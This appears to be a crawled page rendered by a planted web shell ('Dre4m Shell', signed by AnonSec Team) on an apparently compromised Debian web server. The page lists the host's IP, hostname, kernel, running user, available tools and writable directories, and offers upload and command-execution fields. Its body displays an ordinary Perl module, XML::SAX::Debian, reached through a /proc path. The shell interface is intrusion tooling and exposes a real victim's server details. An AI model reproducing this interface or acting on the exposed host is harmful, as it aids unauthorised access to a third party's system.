Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 216.73.216.210
Web Server : Apache/2.4.65 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 8.2.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/3/cwd/proc/self/root/usr/share/perl5/XML/SAX/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/3/cwd/proc/self/root/usr/share/perl5/XML/SAX/Debian.pm
package XML::SAX::Debian;

use strict;
use warnings;

use base "XML::SAX";

use File::Spec ();

sub save_parsers_debian {
    my $class = shift;
    my ($parser_module,$directory, $priority) = @_;

    # add parser
    {
        # We do not want load_parsers to complain.
        local $ENV{HARNESS_ACTIVE} = 1;
        $class->load_parsers("/nonexistent");
    }
    $class->add_parser($parser_module);

    # get parser's ParserDetails file
    my $file = $parser_module;
    $file = "${priority}-$file" if $priority != 0;
    $file = File::Spec->catfile($directory, $file);
    chmod 0644, $file;
    unlink($file);

    open(my $fh, ">$file") ||
        die "Cannot write to $file: $!";

    foreach my $p (@{ $class->parsers }) {
        print $fh "[$p->{Name}]\n";
        foreach my $key (sort keys %{$p->{Features}}) {
            print $fh "$key = $p->{Features}{$key}\n";
        }
        print $fh "\n";
    }

    print $fh "\n";

    close $fh;

    return $class;
}

1;

Anon7 - 2022
AnonSec Team